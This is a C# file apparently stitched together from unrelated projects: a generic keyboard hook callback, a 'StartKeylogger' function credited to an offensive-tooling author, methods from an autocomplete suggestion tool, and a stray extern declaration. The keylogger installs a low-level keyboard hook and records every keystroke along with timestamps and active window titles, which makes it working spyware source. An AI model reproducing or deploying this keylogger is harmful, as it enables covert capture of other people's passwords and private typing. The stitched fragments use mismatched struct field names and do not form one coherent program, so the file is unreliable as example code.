private IntPtr HookProcCallback(int code, uint wParam, IntPtr lParam)
{
if (code >= 0)
{
KbDllHookStruct kbDllHookStruct =
(KbDllHookStruct)Marshal.PtrToStructure(lParam, typeof(KbDllHookStruct));
Keys key = (Keys)kbDllHookStruct.vkCode;
KeyEventArgs keyEventArgs = new KeyEventArgs(key);
if (wParam == WM_KEYDOWN || wParam == WM_SYSKEYDOWN)
{
OnKeyDown(this, keyEventArgs);
}
else if (wParam == WM_KEYUP || wParam == WM_SYSKEYUP)
{
OnKeyUp(this, keyEventArgs);
}
if (keyEventArgs.Handled)
{
return((IntPtr)1);
}
}
return(CallNextHookEx(IntPtr.Zero, code, wParam, lParam));
}
/// <summary>
/// Starts the Keylogger
/// </summary>
/// <author>Scottie Austin (@checkymander)</author>
/// <returns>String containing the captured keystrokes, along with identification of what window they were entered in.</returns>
/// <param name="Seconds">The amount of time in seconds the keylogger should run for before returning keystrokes.</param>
public static string StartKeylogger(int Seconds)
{
StringBuilder Builder = new StringBuilder();
Builder.Append(String.Format("Starting keylogger for {0} seconds.", Seconds));
IntPtr HookID = IntPtr.Zero;
string PreviousActiveWindow = "";
HookProc = (nCode, wParam, lParam) =>
{
try
{
var CurrentActiveWindow = GetActiveWindowTitle();
if (CurrentActiveWindow != PreviousActiveWindow)
{
Builder.Append("\r\n");
PreviousActiveWindow = CurrentActiveWindow;
Builder.Append("\r\n" + DateTime.Now + "\r\n" + CurrentActiveWindow + "\r\n--------------------------\r\n");
}
if (nCode >= 0 && wParam == (IntPtr)Win32.User32.WM_KEYDOWN)
{
KbDllHookStruct kbHookStruct = (KbDllHookStruct)Marshal.PtrToStructure(lParam, typeof(KbDllHookStruct));
int vkCode = kbHookStruct.VirtualKeyCode;
bool shifted = PInvoke.Win32.User32.GetKeyState(160) < 0 || PInvoke.Win32.User32.GetKeyState(161) < 0;
Keys keycode = (Keys)vkCode;
if (!(shifted && KeyDictShift.TryGetValue(keycode, out string append)) && !KeyDict.TryGetValue(keycode, out append))
{
bool capped = PInvoke.Win32.User32.GetKeyState(20) != 0;
if ((capped && shifted) || !(capped || shifted))
{
append = keycode.ToString().ToLower();
}
else
{
append = keycode.ToString().ToUpper();
}
}
if (vkCode == 231)
{
append = ((char)kbHookStruct.ScanCode).ToString();
}
Builder.Append(append);
}
}
catch (Exception e)
{
Console.Error.WriteLine("Keylogger Exception - " + e.GetType().FullName + ": " + e.Message + Environment.NewLine + e.StackTrace);
}
return(PInvoke.Win32.User32.CallNextHookEx(HookID, nCode, wParam, lParam));
};
HookID = PInvoke.Win32.User32.SetWindowsHookEx(Win32.User32.WH_KEYBOARD_LL, HookProc, PInvoke.Win32.Kernel32.GetModuleHandle(Process.GetCurrentProcess().MainModule.ModuleName), 0);
if (Seconds <= 0)
{
Forms.Application.Run();
return("");
}
else
{
using (Timer timer = new Timer(Seconds * 1000))
{
timer.Elapsed += (source, e) =>
{
Builder.AppendLine(String.Format("\r\n\r\nFinished Keylogger at {0:HH:mm:ss.fff}", DateTime.Now));
PInvoke.Win32.User32.UnhookWindowsHookEx(HookID);
timer.Stop();
Forms.Application.Exit();
};
timer.Start();
Forms.Application.Run();
return(Builder.ToString());
}
}
}
private bool handleRequestSuggestionMode(KbDllHookStruct kbDllHookStruct)
{
// Keep track of keyboard key 0-9, a-z and ' "
// For the full list of key covers, please refer to http://www.kbdedit.com/manual/low_level_vk_list.html
int VK_KEY_0 = 0x30;
int VK_KEY_Z = 0x5A;
int VK_OEM_7 = 0xDE; // OEM_7 (" ')
int VK_OEM_1 = 0xBA; // OEM_1 (: ;)
int VK_SPACE = 0x20;
int VK_BACK = 0x08;
int VK_LCONTROL = 0xA2;
int VK_RCONTROL = 0xA3;
int VK_LMENU = 0xA4; // left atrl
int VK_RMENU = 0xA5; // right atrl
int VK_LSHIFT = 0xA0;
int VK_RSHIFT = 0xA1;
if (autoCompleteForm.Visible)
{
bool isCTRLKey = (Convert.ToBoolean(GetAsyncKeyState(VK_LCONTROL)) || Convert.ToBoolean(GetAsyncKeyState(VK_RCONTROL)));
if (isCTRLKey)
{
int[] keys = {(int)Keys.D1, (int)Keys.D2, (int)Keys.D3, (int)Keys.D4, (int)Keys.D5,
(int)Keys.D6, (int)Keys.D7, (int)Keys.D8, (int)Keys.D9};
for (int i = 0; i < autoCompleteForm.getDisplaySuggestionCount(); i++)
{
if (kbDllHookStruct.vkCode == keys[i])
{
autoCompleteForm.quickPaste(i);
return false;
}
}
}
// Allow user to interact with the form when the pop-up is displaying.
if (kbDllHookStruct.vkCode == (int)Keys.Down || kbDllHookStruct.vkCode == (int)Keys.Up)
{
autoCompleteForm.selectFirstIndex();
return false; // block key
}
if (kbDllHookStruct.vkCode == (int)Keys.Right)
{
autoCompleteForm.nextSuggestionPage();
return false; // block key
}
if (kbDllHookStruct.vkCode == (int)Keys.Left)
{
// With this check, it allow user to press left button on Document when there is no previous page
if (autoCompleteForm.getPageIndex() != 1)
{
autoCompleteForm.previousSuggestionPage();
return false; // block key
}
}
if (kbDllHookStruct.vkCode == (int)Keys.Escape)
{
autoCompleteForm.Hide();
return false; // block key
}
}
bool isValidKeyTrigger = (kbDllHookStruct.vkCode >= VK_KEY_0 && kbDllHookStruct.vkCode <= VK_KEY_Z) || kbDllHookStruct.vkCode == VK_OEM_7
|| kbDllHookStruct.vkCode == VK_OEM_1 || kbDllHookStruct.vkCode == VK_SPACE || kbDllHookStruct.vkCode == VK_BACK || kbDllHookStruct.vkCode == (int)Keys.OemPeriod
|| kbDllHookStruct.vkCode == (int)Keys.Oem2;
// Special keys here refer to ALT and CTRL key
bool isSpecialKeyPressed = (Convert.ToBoolean(GetAsyncKeyState(VK_LCONTROL)) || Convert.ToBoolean(GetAsyncKeyState(VK_RCONTROL)) ||
Convert.ToBoolean(GetAsyncKeyState(VK_LMENU)) || Convert.ToBoolean(GetAsyncKeyState(VK_RMENU)));
if (isValidKeyTrigger && !isSpecialKeyPressed && Mode == TriggerMode.AUTO_TRIGGER)
{
autoCompleteForm.Hide();
// Fetch GUITHREADINFO to prepare for evaluateCaretPosition() when the triggerSuggTimer elapse.
getCaretPosition();
if (triggerSuggTimer == null)
{
triggerSuggTimer = new System.Timers.Timer();
triggerSuggTimer.Elapsed += new ElapsedEventHandler(delegate(Object sender, ElapsedEventArgs e)
{
triggerSuggTimer.Stop();
triggerSuggestion(true);
// Logging for user testing
startReqSuggTime = DateTime.Now;
});
}
triggerSuggTimer.Interval = TriggerDelay;
triggerSuggTimer.Stop();
triggerSuggTimer.Start();
}
else if ((kbDllHookStruct.vkCode == triggerSuggestionPopUpKey) && checkHotkeysModifiers("triggerSuggestionPopUp"))
{
getCaretPosition();
triggerSuggestion(false);
}
else if (kbDllHookStruct.vkCode != VK_LCONTROL && kbDllHookStruct.vkCode != VK_RCONTROL && kbDllHookStruct.vkCode != VK_LSHIFT
&& kbDllHookStruct.vkCode != VK_RSHIFT)
{
autoCompleteForm.Hide();
}
return true;
}
private bool handleExtensionMode(KbDllHookStruct kbDllHookStruct)
{
int code = -1;
if (kbDllHookStruct.vkCode == (int)Keys.Space || kbDllHookStruct.vkCode == (int)Keys.Enter)
{
extMode.resetExtensionMode();
return false;
}
else if (kbDllHookStruct.vkCode == (int)Keys.Back)
{
extMode.removeRangeTextAndRepositionCursor(extMode.getExtensionRange());
extMode.resetExtensionMode();
return false;
}
else
{
code = checkKeyCombination(kbDllHookStruct);
// if is correct key combination and is extension mode
if (code > -1 && extMode.getExtensionPos() != -1)
{
if (extensionBw == null)
{
extensionBw = new BackgroundWorker();
extensionBw.DoWork += extensionBgWork;
}
if (!extensionBw.IsBusy)
extensionBw.RunWorkerAsync(code);
return false;
}
else if (kbDllHookStruct.vkCode == (int)Keys.LControlKey || kbDllHookStruct.vkCode == (int)Keys.RControlKey ||
kbDllHookStruct.vkCode == (int)Keys.LMenu || kbDllHookStruct.vkCode == (int)Keys.RMenu ||
kbDllHookStruct.vkCode == (int)Keys.LShiftKey || kbDllHookStruct.vkCode == (int)Keys.RShiftKey)
{
return true;
}
else
{
if (extensionBw == null || !extensionBw.IsBusy)
{
extendSuggestionForm.fadeOut();
extMode.resetExtensionMode();
}
}
}
return true;
}
private int checkKeyCombination(KbDllHookStruct kbDllHookStruct)
{
int code = -1;
// check key combination
if (kbDllHookStruct.vkCode == extendParagraphKey && checkHotkeysModifiers("extendParagraph"))
code = ExtensionMode.EXTENDPARAGRAPH;
else if (kbDllHookStruct.vkCode == reduceParagraphKey && checkHotkeysModifiers("removeParagraph"))
code = ExtensionMode.REMOVEPARAGRAPH;
else if (kbDllHookStruct.vkCode == extendSentenceKey && checkHotkeysModifiers("extendSentence"))
code = ExtensionMode.EXTENDSENTENCE;
else if (kbDllHookStruct.vkCode == reduceSentenceKey && checkHotkeysModifiers("removeSentence"))
code = ExtensionMode.REMOVESENTENCE;
else if (kbDllHookStruct.vkCode == extendWordKey && checkHotkeysModifiers("extendWord"))
code = ExtensionMode.EXTENDWORD;
else if (kbDllHookStruct.vkCode == reduceWordKey && checkHotkeysModifiers("removeWord"))
code = ExtensionMode.REMOVEWORD;
return code;
}
public static extern IntPtr CallNextHookEx(IntPtr hhk, int nCode, IntPtr wParam, ref KbDllHookStruct lParam);